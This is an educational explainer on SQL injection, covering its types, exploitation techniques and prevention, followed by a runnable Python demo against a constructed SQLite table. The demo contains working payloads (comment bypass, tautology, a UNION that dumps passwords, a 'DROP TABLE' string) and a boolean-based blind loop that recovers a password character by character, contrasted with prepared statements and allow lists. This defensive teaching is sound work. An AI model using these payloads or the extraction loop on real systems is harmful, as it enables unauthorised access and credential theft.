What is SQL Injection?
SQL injection is a technique in which an attacker injects SQL fragments into a SQL
statement through input supplied to a web page, so that the database executes the
attacker's logic as part of the application's own query.
A successful SQL injection exploit can read sensitive data from the database,
insert, update or delete database data, execute administrative operations on the database (e.g.
shut down the DBMS), recover the contents of a given file present on the DBMS file system
and, in some cases, issue commands to the operating system.
SQL injection attacks are a type of injection attack, in which SQL commands are injected
into data-plane input in order to affect the execution of predefined SQL commands. The root
cause is that the application concatenates untrusted input into the query text, so the
database cannot distinguish the developer's code from the attacker's data.
Types of SQL Injection
– In band
In-band SQL injection occurs when an attacker is able to use the same communication
channel both to launch the attack and to gather the results, for example by reading query
output or database error text in the HTTP response.
– Out of band
Out-of-band SQL injection occurs when an attacker is unable to use the same
communication channel both to launch the attack and to gather the results, and instead
relies on the database server opening a separate connection (for example a DNS or HTTP
request) to carry the data out.
– Blind SQLi
Blind SQL injection is a type of SQL injection attack in which the application returns no
query output or error text. The attacker instead asks the database true or false
questions and infers the answer from differences in the application's response, either
its content or how long it takes to arrive.
SQL Injection Exploitation Technique
– Error based Exploitation
– Union based Exploitation
– Boolean based Exploitation
– Time-based Delay Exploitation
– Content-based Exploitation
How does SQL Injection work?
– The application sends a form to the user
– The attacker submits the form with SQL exploit data in one or more fields
– The application builds the SQL string by concatenating the exploit data into the query text
– The application sends the SQL query to the database
– The database executes the query, exploit included, and sends the result back to the application
– The application returns the data to the user
What can an attacker do with SQL Injection?
There are a number of things an attacker can do when exploiting an SQL injection on a
vulnerable website. Usually, it depends on the privileges of the user the web application uses
to connect to the database server. By exploiting an SQL injection vulnerability, an attacker
can:
– Add, delete, edit or read content in the database
– Read source code from files on the database server
– Write files to the database server
– Bypass authentication
It all depends on the capabilities of the attacker and the privileges of the database account,
but the exploitation of an SQL injection vulnerability can even lead to a complete takeover of
the database and web server.
How to prevent SQL Injection attacks?
An organization can adopt the following policy to protect itself against SQL injection attacks.
– User input should never be trusted – it must always be validated against what the
application expects (type, length, allowed values) before it is used. Validation is a layer
of defence in depth; it does not replace parameterised queries.
– Stored procedures – these can encapsulate the SQL statements and treat all input as
parameters. They only help if the procedure itself does not build dynamic SQL by
concatenating its parameters; a procedure that does so is just as injectable.
– Prepared statements – prepared statements work by compiling the SQL statement
first and then binding all submitted user data as parameters. The data therefore has no
effect on the syntax of the SQL statement. This is the primary defence. Identifiers such as
table and column names cannot be bound as parameters, so where they come from user
input they must be checked against an allow list.
– Regular expressions – these are sometimes used to detect potentially harmful input and
remove it before executing the SQL statements. Such deny-list filtering is easily bypassed
(alternative syntax, encodings, comments) and should be treated at most as a supplementary
control, never as the only one.
– Database connection user access rights – only the necessary access rights should be
given to accounts used to connect to the database; for example, the web application's
account should not be able to write files, execute operating system commands or alter the
schema. This limits what an injected statement can do on the server.
– Error messages – these should not reveal sensitive information or where exactly an
error occurred. A simple custom error message such as "Sorry, we are experiencing
technical errors. The technical team has been contacted. Please try again later" can be
shown instead of displaying the SQL statement that caused the error, while the full detail is
written to the server-side log.
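The following added example (not part of the original page) walks through the flow described under "How does SQL Injection work?" and the controls listed above in one runnable Python script against an in-memory SQLite database. The users table, its rows and the function names are constructed for this illustration. It shows the vulnerable string-built query being bypassed by a comment, a tautology and a UNION, a boolean-based blind loop that recovers a password one character at a time from nothing but "login succeeded or not", and then the same payloads failing against a prepared statement, an allow list for a sort column that cannot be parameterised, and a generic error wrapper.

```python
import logging
import sqlite3
import string

log = logging.getLogger("login")

# Constructed in-memory database standing in for the application's backend;
# the table and its rows are invented for this example.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users(username, password, role) VALUES
            ('alice', 'correct horse', 'admin'),
            ('bob',   'hunter2',       'user');
    """)
    return conn

# --- Vulnerable: the flow described under "How does SQL Injection work?" ---

def vulnerable_login_sql(username, password):
    # The application builds the statement by splicing the form fields into
    # the SQL text, so the database cannot tell data from code.
    return ("SELECT username, role FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")

def vulnerable_login(conn, username, password):
    return conn.execute(vulnerable_login_sql(username, password)).fetchall()

def blind_extract(conn, target_user, length):
    # Boolean-based blind exploitation: the only thing observed is whether the
    # login returns a row. The target's password is recovered one character at
    # a time by asking the database true/false questions about substr().
    recovered = ""
    for pos in range(1, length + 1):
        for ch in string.ascii_letters + string.digits + " ":
            probe = (f"bob' AND substr((SELECT password FROM users WHERE username = "
                     f"'{target_user}'), {pos}, 1) = '{ch}'--")
            if vulnerable_login(conn, probe, "x"):
                recovered += ch
                break
    return recovered

# --- Hardened: the controls listed under prevention ---

def safe_login(conn, username, password):
    # Prepared statement: the SQL text is fixed and user data travels as bound
    # parameters, so quotes or comment markers in it cannot alter the syntax.
    # (Real applications compare password hashes, not plaintext; omitted here.)
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()

# Identifiers cannot be bound as parameters, so a user-chosen sort column is
# checked against an allow list rather than cleaned with a deny-list regex.
ALLOWED_SORT_COLUMNS = {"username", "role"}

def list_users(conn, sort_by):
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column")
    return conn.execute(f"SELECT username, role FROM users ORDER BY {sort_by}").fetchall()

GENERIC_ERROR = "Sorry, we are experiencing technical errors. Please try again later."

def endpoint(fn, *args):
    # Generic error handling: details go to the server log, never to the client.
    try:
        return {"ok": True, "rows": fn(*args)}
    except (sqlite3.Error, ValueError) as exc:
        log.error("database request failed: %s", exc)
        return {"ok": False, "error": GENERIC_ERROR}

def demo():
    conn = build_db()
    payloads = {
        "legit": ("bob", "hunter2"),
        "comment_bypass": ("alice'--", "anything"),   # '--' drops the password check
        "tautology": ("' OR 1=1--", "x"),             # every row satisfies the WHERE
        "union": ("x' UNION SELECT username, password FROM users--", "x"),  # in-band extraction
    }
    vulnerable = {k: vulnerable_login(conn, *v) for k, v in payloads.items()}
    hardened = {k: endpoint(safe_login, conn, *v) for k, v in payloads.items()}
    return {
        "vulnerable": vulnerable,
        "hardened": hardened,
        "blind": blind_extract(conn, "alice", 13),
        "sorted": endpoint(list_users, conn, "role"),
        "bad_sort": endpoint(list_users, conn, "username; DROP TABLE users"),
    }

if __name__ == "__main__":
    import pprint
    pprint.pprint(demo())
```

Running the script prints the vulnerable results (the comment payload logs in as alice, the tautology returns every user, the UNION returns every password, and the blind loop spells out "correct horse") next to the hardened ones, where each malicious string is simply compared as a literal username and matches nothing. Note that the blind loop succeeds even though the vulnerable page never shows query output or error text, which is why suppressing error messages alone is not a fix.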